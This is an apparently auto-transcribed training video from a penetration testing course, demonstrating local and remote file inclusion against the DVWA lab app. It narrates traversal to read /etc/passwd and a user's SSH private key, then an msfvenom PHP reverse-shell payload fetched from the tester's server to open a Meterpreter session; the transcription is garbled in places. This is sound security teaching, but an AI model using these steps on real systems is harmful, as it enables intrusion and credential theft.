File Inclusion Demo

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
or

Already have an account? Sign In »

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:01
So here we are on D V W A here's an apple Isar. So I know it's a boon to which means it's Lennox, which means if I look for the etc. Password file, it will work. I'm looking for a windows file. It won't work because this is not a Windows box. Also we're looking at PHP and we're on Apache 2.2 point eight.
00:19
And I also know the version of PHP here.
00:23
So I can see this page parameter is including this include PHP
00:29
file. Now
00:31
with Delphi the dot dot slash matters because if I do this and it says etc, password,
00:38
this might not work. So it really depends how far I go back. So you can just keep doing this manually
00:44
again, this might take a long time depending on how far back we go and how
00:49
how the PHP has written.
00:52
But here we go.
00:53
So now we see the etc. Password file. So I'll view source and see how much nicer that is than um in the slide.
01:02
So I'm looking for
01:03
the users, I see MSF admin
01:07
and because I know how uh Lennox is structured and I'm looking at the MSF admin user
01:14
but I'm gonna attack on at the end here
01:18
sort of etc. Password
01:23
is home MSF admin, which is that user 1000
01:27
dot S S H I D R esa.
01:30
If they have their chemists configured, I should be able to read it
01:36
and I can see here that it is mis configured
01:38
and I am I am able to view it. So now what do you do?
01:42
So again, I view Source, I grabbed this key
01:47
and what I'm gonna do
01:49
is that I'm going to make my own key. MSF admin,
01:53
I'm going to paste that private key information into here.
01:57
Going to exit out of this. And you have to charm a this to you can do 400
02:05
or 600.
02:07
Yeah.
02:07
And now what I should be able to do is ssh.
02:10
Mhm.
02:12
MSF admin. And then give it on that boxes. MSF admin, which I did. So
02:17
now I'm on the box because I use elephant to grab the ssh key.
02:23
That's great.
02:24
So let's exit out of here
02:27
and let me show you what happens with our if I remote file inclusion. Now
02:30
Remember I need to be able to see if it can reach out to my server. So NLVP 4444
02:38
and I'll go back and I'm going to change this
02:43
To my server. HDP 19216812- 8.4444.
02:53
And I see here that the connection was received, it's not looking for any file in particular so I can name my file whatever I want to.
03:00
I'm going to kill the connection here.
03:04
And what I'm gonna do is I'm going to create that shell dot txt file
03:08
with MSF venom.
03:12
Now you'll notice the payloads, PHP interpreter, reverse TCP with my host as well as the L host and my L port is 4444
03:22
And we're gonna make this into this TxT file.
03:24
Like I said sometimes when you make it a PHP file, it will execute on your own server. And you're like, oh, this looks awfully familiar. Well that's because it's your own server.
03:34
So the other thing to do is we want to set up uh met despite.
03:40
So you know, I like to execute things directly from the terminal here
03:46
before actually loading municipal the municipal a framework
03:52
so I should have everything set up and ready to go.
04:03
So what I'll do now is I need to set up a server on my own machine.
04:10
So I'm gonna use python three
04:12
an http server.
04:15
And
04:17
I'm going to
04:23
change this now.
04:28
Two. HDP
04:30
1921681228
04:33
8000. Because that's where our servers running on 48,000
04:38
and shell dot txt.
04:43
All right. That's on 48,000. That's why I chose that. And you can see that interpreter session is opened.
04:49
Mhm.
04:50
And I see there it is. So, if I interact with it, session one Sys info.
04:57
I see I'm on my display table here.
04:59
So that's how to leverage both. L if I to find valuable information in this case an ssh key where we can ssh onto this machine
05:08
or r. F. I where we can host our own file and have the server reach out and execute our shell so that now we're on the box here.
05:19
So those are file inclusion vulnerabilities, and that's how to exploit them.
Up Next
Offensive Penetration Testing

The Offensive Penetration Testing course opens the doors to those wanting to begin a penetration testing career. This course will prepare learners to begin their pentesting career journey by understanding what tools, techniques, and resources are available for someone starting out in offensive penetration testing.

Instructed By